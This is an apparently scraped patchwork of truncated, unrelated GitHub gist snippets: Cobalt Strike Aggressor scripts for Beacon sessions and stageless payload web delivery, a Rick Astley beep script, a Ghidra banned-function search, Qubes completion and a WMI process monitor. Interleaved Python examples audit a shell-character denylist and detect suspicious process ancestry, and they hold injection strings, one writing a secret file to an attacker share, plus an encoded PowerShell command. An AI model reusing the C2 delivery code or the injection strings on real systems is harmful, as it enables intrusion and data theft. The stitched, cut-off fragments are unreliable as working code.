This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-RickAstley(){
    [console]::beep(440,150)#A
    [console]::beep(493,150)#B
    [console]::beep(587,150)#D
    [console]::beep(493,150)#B
    Start-Sleep -m 20
    [console]::beep(698,400)#F
    [console]::beep(698,400)#F
    [console]::beep(659,500)#E
    Start-Sleep -m 50

# getexplorerpid($bid, &callback);
sub getexplorerpid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq "explorer.exe") {
                # $1 is our Beacon ID, $pid is the PID of explorer.exe
                [$callback: $1, $pid];
            }

#
# Aggressor Script means to parse/use environment vars in a Beacon session.
#
global('%bvars');

# request environment variables for every new Beacon that comes in.
on beacon_initial {
    # ideally, we'd have a bshell that could take callbacks. We don't have
    # this yet. Eventually though, we will.

sub IsSafe {
    #http://sleep.dashnine.org/manual/index.html
    local('$pos');
    @badchars = @(";", "&", '$', "'");
    foreach $index => $value (@badchars)
    {
        $pos = indexOf($1, $value);
        if (-isnumber $pos)
        {
            println("Invalid char detected");
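The IsSafe routine above is a denylist: it rejects an argument only if it contains one of `;`, `&`, `$` or `'`. The following is an added example, not code from the gist or from Cobalt Strike: a Python port of that check placed beside an allowlist version, run over constructed inputs to show which Windows shell metacharacters pass the denylist untouched. The sample strings, the allowlist pattern and the assumption that the value ends up on a cmd.exe command line are all assumptions of this example.

```python
import re

# The four characters the gist's IsSafe routine rejects (mirrors its @badchars).
DENYLIST = (";", "&", "$", "'")

# Further characters cmd.exe interprets that the denylist lets through.
# Assumption for this example: the string is going to be handed to a Windows shell.
CMD_METACHARS = ("|", "<", ">", "^", "%", "!", '"', "(", ")", "\n", "\r")

# Allowlist: letters, digits and the punctuation a path or plain token needs.
_ALLOWED = re.compile(r"[A-Za-z0-9_.\\/:\-]+")


def is_safe_denylist(value: str) -> bool:
    """Port of the gist's check: the input is 'safe' unless a denylisted char appears."""
    return not any(c in value for c in DENYLIST)


def is_safe_allowlist(value: str) -> bool:
    """Accept the input only if every character is on the allowlist."""
    return bool(value) and _ALLOWED.fullmatch(value) is not None


def bypasses_denylist(value: str) -> bool:
    """True when the denylist passes an input that still carries a shell metacharacter."""
    return is_safe_denylist(value) and any(c in value for c in CMD_METACHARS)


# Constructed inputs: one benign path, two the denylist catches, and four it misses.
SAMPLES = [
    r"C:\Windows\Temp\report.txt",
    "whoami; net user",
    "dir | net user /add evil",
    "type secret.txt > \\\\attacker\\share\\out.txt",
    "%COMSPEC% /c calc",
    "pow^ershell -enc AAAA",
    "it's",
]


def audit(values):
    """Evaluate each input under both checks; returns (value, denylist_ok, allowlist_ok, bypass)."""
    return [
        (v, is_safe_denylist(v), is_safe_allowlist(v), bypasses_denylist(v))
        for v in values
    ]


if __name__ == "__main__":
    for value, deny_ok, allow_ok, bypass in audit(SAMPLES):
        flag = "BYPASS" if bypass else ""
        print(f"{value!r:45} denylist={deny_ok!s:5} allowlist={allow_ok!s:5} {flag}")
```

Pipes, redirects, carets and `%VAR%` expansion all survive the denylist, so a value that passes IsSafe can still alter the command it is spliced into. An allowlist of the characters the argument legitimately needs is the safer shape; safer still is not concatenating untrusted text into a shell string at all.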

# This script locates potentially dangerous functions that could introduce a vulnerability if they are used incorrectly.
#@author: VDA Labs (Michael Fowl)
#@category Functions

print "Searching for banned functions..."

# Microsoft SDL banned.h list.
blist = (["strcpy", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy",
          "StrCpyA", "StrCpyW", "lstrcpy", "lstrcpyA", "lstrcpyW", "_tccpy", "_mbccpy",
          "_ftcscpy", "strcat", "strcatA", "strcatW", "wcscat", "_tcscat", "_mbscat",

# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.

import common.*;
import beacon.*;

_qvm-run() {
    local app_vms
    app_vms=( $(qvm-ls --raw-list|grep -v "^dom0$") )
    local exc=
    if (( words[(I)--all] )); then
        exc="*--exclude=[When --all is used: exclude this VM name (may be repeated)]:QubesVMs:($app_vms)"
    fi
    _arguments -S '(-a --auto)'{-a,--auto}'[Auto start the VM if not running]'\

### ref: https://twitter.com/dez_/status/986614411711442944
Write-Host "Current Pid: " $Pid
# Raise our own scheduling priority so the WMI polling below is not starved.
(Get-Process -Id $pid).priorityclass = "RealTime"
# __InstanceCreationEvent is a polled intrinsic event; WITHIN is the polling interval in seconds.
$Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 0.0001 WHERE TargetInstance ISA "Win32_Process"'
$action = {
    $e = $Event.SourceEventArgs.NewEvent.TargetInstance
    # {0,5} right-aligns the PIDs in a 5-character field; ExecutablePath is quoted on its own.
    $fmt = 'ProcessStarted: (ID={0,5}, Parent={1,5}, cmdline={2}, ExecutablePath="{3}", Name={4})'
    $msg = $fmt -f $e.ProcessId, $e.ParentProcessId, $e.CommandLine, $e.ExecutablePath, $e.Name
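The $action above prints one ProcessStarted line per new process, carrying its parent PID and command line. As an added example that is not part of the gist, here is a Python parser for those lines plus a parent-child check run over a constructed log: it flags shells and script hosts whose ancestry, as far as the log records it, leads back to an Office application or a browser. The field order (ID, Parent, cmdline, ExecutablePath, Name) follows $fmt; the watched-process sets, the depth limit and the sample lines are choices made for this example, and the regex accepts the ExecutablePath value with or without its closing quote so that lines print in either quoting layout parse.

```python
import re
from typing import Dict, List, Optional, Tuple

# Matches the ProcessStarted line produced by the gist's $fmt.  The closing quote
# after ExecutablePath is optional so the line parses whether that quote sits after
# the path or after the Name field.
LINE_RE = re.compile(
    r'ProcessStarted: \(ID=\s*(?P<pid>\d+), Parent=\s*(?P<ppid>\d+), '
    r'cmdline=(?P<cmdline>.*), ExecutablePath="(?P<path>.*?)"?, '
    r'Name=(?P<name>.*?)"?\)\s*$'
)

# Parent/child pairings worth alerting on (constructed for this example): document
# viewers, mail clients and browsers rarely have a reason to spawn shells or script hosts.
WATCHED_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                   "chrome.exe", "msedge.exe", "firefox.exe", "acrord32.exe"}
WATCHED_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
MAX_DEPTH = 5  # ancestors to walk before giving up (also guards against PID-reuse loops)


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one ProcessStarted line into a dict, or return None if it does not match."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    ev: Dict[str, object] = m.groupdict()
    ev["pid"] = int(m.group("pid"))
    ev["ppid"] = int(m.group("ppid"))
    ev["name"] = m.group("name").lower()
    return ev


def find_suspicious(lines) -> List[Tuple[int, str, int, str, str]]:
    """Return (child_pid, child_name, ancestor_pid, ancestor_name, cmdline) for every
    watched child whose ancestry, within MAX_DEPTH, contains a watched parent.

    Only processes that were themselves logged can be resolved as ancestors: a parent
    started before the monitor was attached has no entry, and a PID may be reused."""
    by_pid: Dict[int, Dict[str, object]] = {}
    events = []
    for line in lines:
        ev = parse_line(line)
        if ev is not None:
            by_pid[ev["pid"]] = ev
            events.append(ev)
    hits = []
    for ev in events:
        if ev["name"] not in WATCHED_CHILDREN:
            continue
        cur, depth = by_pid.get(ev["ppid"]), 0
        while cur is not None and depth < MAX_DEPTH:
            if cur["name"] in WATCHED_PARENTS:
                hits.append((ev["pid"], ev["name"], cur["pid"], cur["name"], ev["cmdline"]))
                break
            cur, depth = by_pid.get(cur["ppid"]), depth + 1
    return hits


# Constructed sample log in the layout $fmt prints (PIDs right-aligned in 5 characters).
SAMPLE_LOG = [
    r'ProcessStarted: (ID= 3320, Parent=  820, cmdline="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\a\invoice.docm", ExecutablePath="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", Name=WINWORD.EXE)',
    r'ProcessStarted: (ID= 4120, Parent= 3320, cmdline=cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA, ExecutablePath="C:\Windows\System32\cmd.exe", Name=cmd.exe)',
    r'ProcessStarted: (ID= 4188, Parent= 4120, cmdline=powershell -nop -w hidden -enc SQBFAFgA, ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", Name=powershell.exe)',
    # Same line shape with the closing quote after Name instead of after the path.
    r'ProcessStarted: (ID= 5004, Parent= 1444, cmdline="C:\Windows\System32\notepad.exe", ExecutablePath="C:\Windows\System32\notepad.exe, Name=notepad.exe")',
    'not a process line',
]


if __name__ == "__main__":
    for child_pid, child, anc_pid, anc, cmdline in find_suspicious(SAMPLE_LOG):
        print(f"{child} ({child_pid}) descends from {anc} ({anc_pid}): {cmdline}")
```

Two limits follow from where the data comes from. The parent name is only known if the parent was itself logged after the monitor started, so ancestry resolution is best-effort on a live system; and because the WMI query polls, a process that exits inside one polling interval may be missed or reported with an empty CommandLine, which the regex tolerates.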

#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2017, Francesco "dfirfpi" Picasso <francesco.picasso@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0

# Python Stageless Scripted Web Delivery

# setup our stageless Python Web Delivery attack
sub setup_attack {
    local('%options $x86payload $x64payload $url $script');
    %options = $3;

    # generate our stageless x86 payload
    artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
    yield;